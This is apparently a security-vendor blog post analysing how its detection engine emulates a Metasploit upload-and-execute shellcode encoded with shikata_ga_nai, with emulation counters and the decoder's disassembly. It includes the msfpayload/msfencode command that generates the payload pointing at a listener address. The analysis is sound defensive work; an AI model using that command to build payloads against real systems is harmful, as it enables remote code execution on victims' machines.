Quttera web security blog: Investigation report for metasploit's windows/upexec/find_tag shellcode encoded by x86/shikata_ga

Quttera investigation engine statistics of the windows/upexec/find_tag shellcode encoded by x86/shikata_ga_nai encoder

Payload generation command:

msfpayload windows/upexec/find_tag LHOST=192.168.111.129 LPORT=9988 PEXEC=./ R| msfencode -e x86/shikata_ga_nai -t raw

Offset of the detected payload: 0

Payload emulation counters:

WRITES_TO_PROCESS_STACK_MEMORY	0
BUFFER_INSIDE_WRITES_COUNT	24
REFERENCES_TO_PROCESS_INTERNALS	0
BUFFER_OUTSIDE_WRITES_COUNT	0
FAR_JUMPS_COUNT	0
FULLY_INITIALIZED_INSTRUCTIONS	99
PROVIDED_ABSOLUTE_MEMORY_ADDRESSES	1
PROC_CALLS_INSIDE_INV_BUFFER	0
BUFFER_OUTSIDE_READS_COUNT	1
UNDEFINED_DIRECT_CALLS	0
JUMPS_INSIDE_INV_BUFFER	23
CORRECTLY_PARSED_INSTRUCTIONS	100
MEMORY_MODIFYING_MATH_INSTRUCTIONS	0
BUFFER_INSIDE_READS_COUNT	24
SYSTEM_CALLS_COUNT	0
UNRECOGNIZED_CALL_TARGETS	0
REFERENCES_TO_PROCESS_IMPORTS	0
CORRECT_PROCEDURES_CALLS	0
EIP_RETRIEVAL_INSTRUCTIONS	1
JUMPS_TO_PROCESS_INTERNALS	0
EXECUTED_ARITHMETIC_INSTRUCTIONS	24
CALLS_TARGETED_IMPORTS_SECTION	0
UNRECOGNIZED_JUMP_TARGETS	0
CONSEQUENT_SINGLE_BYTE_INSTRUCTIONS	0
REFERENCES_TO_PROCESS_EXPORTS	0
EXECUTES_BITS_OPERATING_INSTRUCTIONS	0
IMMEDIATE_OPERANDS_INSTRUCTIONS	0
INDIRECT_BUFFER_REFERENCES	23
MAX_WRITTEN_MEMORY_BLOCK	0
CORRECTLY_EXECUTED_INSTRUCTIONS	100
READS_FROM_PROCESS_STACK_MEMORY	1
CALLS_TARGETED_EXPORTS_SECTION	0

Detection disassembly:

FCMOVNBE ST0 (0x0000000000000000),ST3 (0x0000000000000001)
MOV ESI (0x00000000),0xF6337EEB
FNSTENV [ESP - 0xC] (0x0A389523)
POP EBP (0x00000000)
XOR ECX (0x00000000),ECX (0x00000000)
MOV CL (0x00),0x18
XOR DS:[EBP + 0x17] (0xBFA57A53),ESI (0xF6337EEB)	;investigation buffer write instruction
ADD ESI (0xF6337EEB),DS:[EBP + 0x17] (0xBFA57A53)	;investigation buffer read instruction
ADD EBP (0xBFA57A3C),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A57),ESI (0xEC1583B0)	;investigation buffer write instruction
ADD ESI (0xEC1583B0),DS:[EBP + 0x17] (0xBFA57A57)	;investigation buffer read instruction
ADD EBP (0xBFA57A40),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A5B),ESI (0x5114B7AC)	;investigation buffer write instruction
ADD ESI (0x5114B7AC),DS:[EBP + 0x17] (0xBFA57A5B)	;investigation buffer read instruction
ADD EBP (0xBFA57A44),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A5F),ESI (0xDC44FF37)	;investigation buffer write instruction
ADD ESI (0xDC44FF37),DS:[EBP + 0x17] (0xBFA57A5F)	;investigation buffer read instruction
ADD EBP (0xBFA57A48),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A63),ESI (0x34D00B77)	;investigation buffer write instruction
ADD ESI (0x34D00B77),DS:[EBP + 0x17] (0xBFA57A63)	;investigation buffer read instruction
ADD EBP (0xBFA57A4C),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A67),ESI (0xBFEB9693)	;investigation buffer write instruction
ADD ESI (0xBFEB9693),DS:[EBP + 0x17] (0xBFA57A67)	;investigation buffer read instruction
ADD EBP (0xBFA57A50),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A6B),ESI (0x6D98B706)	;investigation buffer write instruction
ADD ESI (0x6D98B706),DS:[EBP + 0x17] (0xBFA57A6B)	;investigation buffer read instruction
ADD EBP (0xBFA57A54),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A6F),ESI (0xAA9EBA54)	;investigation buffer write instruction
ADD ESI (0xAA9EBA54),DS:[EBP + 0x17] (0xBFA57A6F)	;investigation buffer read instruction
ADD EBP (0xBFA57A58),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A73),ESI (0xDCFDED86)	;investigation buffer write instruction
ADD ESI (0xDCFDED86),DS:[EBP + 0x17] (0xBFA57A73)	;investigation buffer read instruction
ADD EBP (0xBFA57A5C),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A77),ESI (0x4889DCFB)	;investigation buffer write instruction
ADD ESI (0x4889DCFB),DS:[EBP + 0x17] (0xBFA57A77)	;investigation buffer read instruction
ADD EBP (0xBFA57A60),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A7B),ESI (0x84CF6803)	;investigation buffer write instruction
ADD ESI (0x84CF6803),DS:[EBP + 0x17] (0xBFA57A7B)	;investigation buffer read instruction
ADD EBP (0xBFA57A64),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A7F),ESI (0xFCD4B48E)	;investigation buffer write instruction
ADD ESI (0xFCD4B48E),DS:[EBP + 0x17] (0xBFA57A7F)	;investigation buffer read instruction
ADD EBP (0xBFA57A68),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A83),ESI (0x18E20119)	;investigation buffer write instruction
ADD ESI (0x18E20119),DS:[EBP + 0x17] (0xBFA57A83)	;investigation buffer read instruction
ADD EBP (0xBFA57A6C),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A87),ESI (0x550B5DA4)	;investigation buffer write instruction
ADD ESI (0x550B5DA4),DS:[EBP + 0x17] (0xBFA57A87)	;investigation buffer read instruction
ADD EBP (0xBFA57A70),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A8B),ESI (0xC10F3AA7)	;investigation buffer write instruction
ADD ESI (0xC10F3AA7),DS:[EBP + 0x17] (0xBFA57A8B)	;investigation buffer read instruction
ADD EBP (0xBFA57A74),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A8F),ESI (0x27665ED0)	;investigation buffer write instruction
ADD ESI (0x27665ED0),DS:[EBP + 0x17] (0xBFA57A8F)	;investigation buffer read instruction
ADD EBP (0xBFA57A78),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A93),ESI (0x7E5AEA17)	;investigation buffer write instruction
ADD ESI (0x7E5AEA17),DS:[EBP + 0x17] (0xBFA57A93)	;investigation buffer read instruction
ADD EBP (0xBFA57A7C),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A97),ESI (0x82C1697F)	;investigation buffer write instruction
ADD ESI (0x82C1697F),DS:[EBP + 0x17] (0xBFA57A97)	;investigation buffer read instruction
ADD EBP (0xBFA57A80),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A9B),ESI (0x58C0C0BF)	;investigation buffer write instruction
ADD ESI (0x58C0C0BF),DS:[EBP + 0x17] (0xBFA57A9B)	;investigation buffer read instruction
ADD EBP (0xBFA57A84),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57A9F),ESI (0xCD81466C)	;investigation buffer write instruction
ADD ESI (0xCD81466C),DS:[EBP + 0x17] (0xBFA57A9F)	;investigation buffer read instruction
ADD EBP (0xBFA57A88),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57AA3),ESI (0x83D3E05A)	;investigation buffer write instruction
ADD ESI (0x83D3E05A),DS:[EBP + 0x17] (0xBFA57AA3)	;investigation buffer read instruction
ADD EBP (0xBFA57A8C),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57AA7),ESI (0xDB2A3266)	;investigation buffer write instruction
ADD ESI (0xDB2A3266),DS:[EBP + 0x17] (0xBFA57AA7)	;investigation buffer read instruction
ADD EBP (0xBFA57A90),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57AAB),ESI (0x18D80665)	;investigation buffer write instruction
ADD ESI (0x18D80665),DS:[EBP + 0x17] (0xBFA57AAB)	;investigation buffer read instruction
ADD EBP (0xBFA57A94),0x04
LOOP 0xF5	;random read instruction
XOR DS:[EBP + 0x17] (0xBFA57AAF),ESI (0x84403AAA)	;investigation buffer write instruction
ADD ESI (0x84403AAA),DS:[EBP + 0x17] (0xBFA57AAF)	;investigation buffer read instruction

Quttera web security blog

Pages

Monday, March 18, 2013

Investigation report for metasploit's windows/upexec/find_tag shellcode encoded by x86/shikata_ga_nai encoder

Quttera investigation engine statistics of the windows/upexec/find_tag shellcode encoded by x86/shikata_ga_nai encoder

Payload generation command:

Offset of the detected payload: 0

Payload emulation counters:

Detection disassembly:

No comments:

Post a Comment

emergency
249$ /yr
1 domain
Initial Response Time within 4 hrs.
Manual Malware Removal / Full Website Audit
Blacklisting removal
Web Application Firewall (WAF)
Dedicated Malware Analyst
Create Account

economy
149$ /yr
1 domain
Initial Response Time within 12 hrs.
Malware clean-up
Blacklisting removal
24/7 Access to Cybersecurity Professionals
Create Account